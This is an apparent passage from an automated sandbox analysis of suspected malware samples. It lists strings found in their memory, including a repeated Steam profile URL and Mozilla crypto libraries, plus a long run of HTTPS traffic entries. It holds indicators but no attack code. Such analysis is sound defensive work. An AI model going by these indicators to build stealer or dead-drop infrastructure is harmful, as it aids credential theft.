                    Source: c61fcc859d.exe, 00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2674653328.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614392992.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2628427512.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319002
                    Source: crypted.exe, 00000013.00000003.2516436644.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2528369086.00000000031E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900z
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: c61fcc859d.exe, 0000001E.00000003.2745036681.0000000001354000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900-
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: crypted.exe, 00000013.00000003.2516244139.000000000320A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516680131.0000000003204000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2528962685.000000000320A000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546665053.0000000001093000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744982000.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744805061.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744805061.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516680131.0000000003204000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744805061.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a96
                    Source: c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: c61fcc859d.exe, 00000017.00000003.2568932482.00000000057CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                    Source: c61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: c61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: file.exe, 00000000.00000003.1893904367.0000000023732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1834248014.000000001D3B2000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2568932482.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569524263.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: c61fcc859d.exe, 00000017.00000003.2569524263.000000000579C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016WBg.exe
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1834248014.000000001D3B2000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2568932482.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569524263.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: c61fcc859d.exe, 00000017.00000003.2569524263.000000000579C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                    Source: file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: file.exe, 00000000.00000002.1958673273.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: c61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: file.exe, 00000000.00000002.1958673273.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1958673273.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
                    Source: c61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: file.exe, 00000000.00000002.1958673273.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: file.exe, 00000000.00000003.1893904367.0000000023732000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: c61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: file.exe, 00000000.00000002.1958673273.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: file.exe, 00000000.00000003.1893904367.0000000023732000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: file.exe, 00000000.00000002.1958673273.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                    Source: crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744805061.000000000137B000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
